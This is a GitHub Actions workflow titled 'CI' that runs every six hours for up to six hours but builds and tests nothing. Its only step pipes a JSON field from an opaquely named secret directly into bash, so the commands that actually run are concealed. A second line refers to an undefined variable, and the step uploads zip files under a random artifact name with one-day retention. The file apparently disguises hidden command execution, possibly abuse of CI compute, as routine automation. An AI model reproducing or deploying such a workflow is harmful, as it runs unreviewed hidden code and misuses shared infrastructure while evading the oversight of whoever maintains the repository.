name: CI
on:
  workflow_dispatch:

  schedule:
    - cron: '12 4,10,16,22 * * *'
jobs:
  handler:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          q3: ${{ secrets.q3 }}
        run: |
          printf '%s' "$q3" | jq -r .axp9 | /bin/bash
          echo $cp4 | jq -r .aeate68635 | /bin/bash

      - name: Persist output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: QFYpnNz9
          path: "*.zip"
          retention-days: 1
